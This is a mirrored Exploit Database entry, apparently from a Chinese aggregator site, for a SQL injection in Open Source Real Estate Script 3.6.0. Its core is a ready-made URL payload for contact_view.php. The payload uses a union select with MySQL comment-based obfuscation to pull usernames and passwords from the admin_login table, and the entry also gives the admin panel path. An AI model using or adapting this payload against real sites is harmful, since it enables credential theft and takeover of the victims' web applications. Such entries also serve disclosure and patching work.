Open Source Real Estate Script 3.6.0 – SQL Injection

• Exploit Database
• 16 阅读

• 作者： Meisam Monsef
  日期： 2016-05-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39868/

• # Exploit Title: real-estate classified script Sql Injection
  # Date: 2015-05-29
  # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
  # Vendor Homepage:
  Open source real-estate script
  
  # Version: 3.6.0
  
  
  Exploit :
  http://server/[path]/contact_view.php?contact=-99999+[SQl+Command]
  
  Test :
  http://server/contact_view.php?contact=-25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,10,13,14,15,16,17,18,19,20,username,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000admin_login*/%23
  
  Admin Panel : http://server/admin/